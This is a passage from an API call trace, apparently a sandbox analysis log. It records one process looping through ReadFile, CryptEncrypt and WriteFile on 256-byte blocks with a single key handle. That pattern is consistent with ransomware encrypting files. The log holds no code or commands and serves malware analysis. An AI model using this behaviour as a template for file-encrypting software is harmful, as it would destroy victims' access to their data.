pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.659] GetLastError () returned 0x0 [0144.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.660] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.660] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.660] GetLastError () returned 0x0 [0144.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.660] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.660] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.660] GetLastError () returned 0x0 [0144.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.660] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.660] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.660] GetLastError () returned 0x0 [0144.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.660] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.660] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.660] GetLastError () returned 0x0 [0144.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.660] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.660] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.660] GetLastError () returned 0x0 [0144.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.660] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.660] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.660] GetLastError () returned 0x0 [0144.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.660] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.661] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.661] GetLastError () returned 0x0 [0144.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.661] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.661] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.661] GetLastError () returned 0x0 [0144.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.661] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.661] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.661] GetLastError () returned 0x0 [0144.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.661] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.661] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.661] GetLastError () returned 0x0 [0144.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.661] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.661] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.661] GetLastError () returned 0x0 [0144.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.661] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.661] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.661] GetLastError () returned 0x0 [0144.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.661] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.661] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.661] GetLastError () returned 0x0 [0144.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.662] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.662] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.662] GetLastError () returned 0x0 [0144.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.662] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.662] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.662] GetLastError () returned 0x0 [0144.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.662] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.662] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.662] GetLastError () returned 0x0 [0144.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.662] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.662] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.662] GetLastError () returned 0x0 [0144.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.662] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.662] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.662] GetLastError () returned 0x0 [0144.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.662] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.662] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.662] GetLastError () returned 0x0 [0144.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.662] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.663] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.663] GetLastError () returned 0x0 [0144.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.663] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.663] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.663] GetLastError () returned 0x0 [0144.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.663] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.663] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.663] GetLastError () returned 0x0 [0144.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.663] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.663] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.663] GetLastError () returned 0x0 [0144.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.663] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.663] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.663] GetLastError () returned 0x0 [0144.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.663] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.663] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.663] GetLastError () returned 0x0 [0144.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.663] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.664] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.664] GetLastError () returned 0x0 [0144.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.664] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.664] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.664] GetLastError () returned 0x0 [0144.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.664] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.664] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.664] GetLastError () returned 0x0 [0144.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.664] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.664] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.664] GetLastError () returned 0x0 [0144.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.664] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.664] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.664] GetLastError () returned 0x0 [0144.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.665] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.665] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.665] GetLastError () returned 0x0 [0144.665] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.666] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.666] GetLastError () returned 0x0 [0144.666] 